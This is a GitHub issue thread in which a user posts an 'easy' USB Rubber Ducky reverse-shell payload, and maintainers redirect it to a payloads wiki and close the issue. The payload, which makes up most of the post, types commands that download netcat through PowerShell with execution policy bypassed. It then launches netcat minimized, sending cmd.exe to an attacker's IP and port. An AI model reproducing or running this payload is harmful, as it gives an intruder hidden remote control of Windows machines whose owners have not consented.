Dukweeno/Duckuino #100: Easy RubberDucky Reverse Shell

TIMOTHYMK, 2019-09-10:
Make sure to change IP to your IP, and change PORT as well.

Let me know what you think. Thanks!

DELAY 400
GUI r
DELAY 100

STRING cmd
ENTER
DELAY 100

STRING cd / & mkdir win & cd win & echo (wget 'NETCAT_DL_LINK' -OutFile a.exe) > b.PS1 & powershell -ExecutionPolicy ByPass -File b.ps1
ENTER
DELAY 50

STRING START /MIN a.exe IP PORT -e cmd.exe -d & exit
ENTER

Nurrl, 2019-09-11:
Hello @TIMOTHYMK, this might be a bit out of topic, as this project is only on compatibility one between USB Rubber Ducky and Arduino, maybe you should put it directly to the main repo ?

Plazmaz, 2019-09-11:
^^ Yep, this is probably a better fit for https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads. Looks cool though!

closed 2019-09-14 by Nurrl